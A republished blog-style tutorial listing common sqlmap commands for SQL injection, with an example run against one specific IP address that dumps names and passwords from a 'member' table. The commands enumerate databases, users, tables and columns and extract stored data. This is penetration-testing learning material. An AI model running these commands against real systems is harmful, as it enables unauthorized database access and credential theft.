当前位置:网站首页>sqlmap injection tutorial common commands
sqlmap injection tutorial common commands
2022-07-31 05:53:00 【not used to having you】
sqlmap injection tutorial common commands
sqlmap official website: sqlmap: automatic SQL injection and database takeover tool
sqlmap documentation address: https://github.com/sqlmapproject/sqlmap/wiki/Usage
–hh help manual in detailHighlights
sqlmap.py -u "Injection Address" --dbs // List databases
sqlmap.py -u "Injection Address" --current-db // Current database
sqlmap.py -u "injection address" --users // column database user
sqlmap.py -u "injection address" --current-user // current user
sqlmap.py -u "injection address" --tables -D ""Database" // List the table name of the database
sqlmap.py -u "Injection address" --columns -T "Table name" -D "Database" // Get the column name of the table
sqlmap.py -u"Injection address" --dump -C "Column name" -T "Table name" -D "Database" //Get the column information of the following table in the databaseIt is best to add --level 3 --risk2 after the command, which can increase the depth and speed of scanning
--delay=1 means to send one packet per second
For example:
sqlmap.py -u "http://219.153.49.228:44109/new_list.php?id=1" --dbs //Explosive library
sqlmap.py -u"http://219.153.49.228:44109/new_list.php?id=1" -D stormgroup --tables //burst table
sqlmap.py -u "http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member --columns burst list
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member-C name,password --dump burst field value
Respect originality:
Loaded at: https://www.csdn.net/tags/NtjaAgzsNDk2NTMtYmxvZwO0O0OO0O0O.html
边栏推荐
- 闭包(二)
- First acquaintance with Flask
- On the side of Ali, tell me what are the application scenarios of message middleware you know?
- How to distinguish big and small endian in C language
- 字符串的新增方法
- Sword Point Offer Special Assault Edition ---- Day 2
- 【swagger关闭】生产环境关闭swagger方法
- wpf wrapPanel居中并从左到右排列
- 解决响应式数据依赖响应式数据无响应问题
- 11 【组件通信】
猜你喜欢
leetcode-每日一题735. 行星碰撞(栈模拟)
gin框架学习-Casbin入门指南(ACL、RBAC、域内RBAC模型)
gin框架学习-Casbin进阶之策略管理API使用方法
gin框架学习-JWT认证
三子棋讲解(C语言)
闭包(五)----一个常见的循环
On the side of Ali, tell me what are the application scenarios of message middleware you know?
leetcode-每日一题1252. 奇数值单元格的数目(模拟优化)
“档次法”——用于物品体积分布不均匀的01背包问题的求解方法
12 【网页布局总结 元素的显示与隐藏】
随机推荐
工件SSMwar exploded 部署工件时出错。请参阅服务器日志了解详细信息
mysql启动报错The server quit without updating PID file几种解决办法
闭包(二)
解决响应式数据依赖响应式数据无响应问题
Digital twins will be an important way to enter the "metaverse"
16 【打包上线 图片懒加载】
【ubuntu20.04安装MySQL以及MySQL-workbench可视化工具】
MySQL压缩包方式安装,傻瓜式教学
leetcode-2321. 拼接数组的最大分数(差分+枚举)
在kali上搭建vulhub漏洞靶场
uni-app进阶之内嵌应用【day14】
What is the difference between NFT and digital collection?
Regular Expression Basics
DeFi Token in the project management
Xiaobai learns reptiles - introduction to reptiles
vulhub靶场学习日记xxe-lab
The MySQL database in Alibaba Cloud was attacked, and the data was finally recovered
03 【数据代理 事件处理】
MySQL-如何分库分表?一看就懂
12 【nextTick 过渡与动画】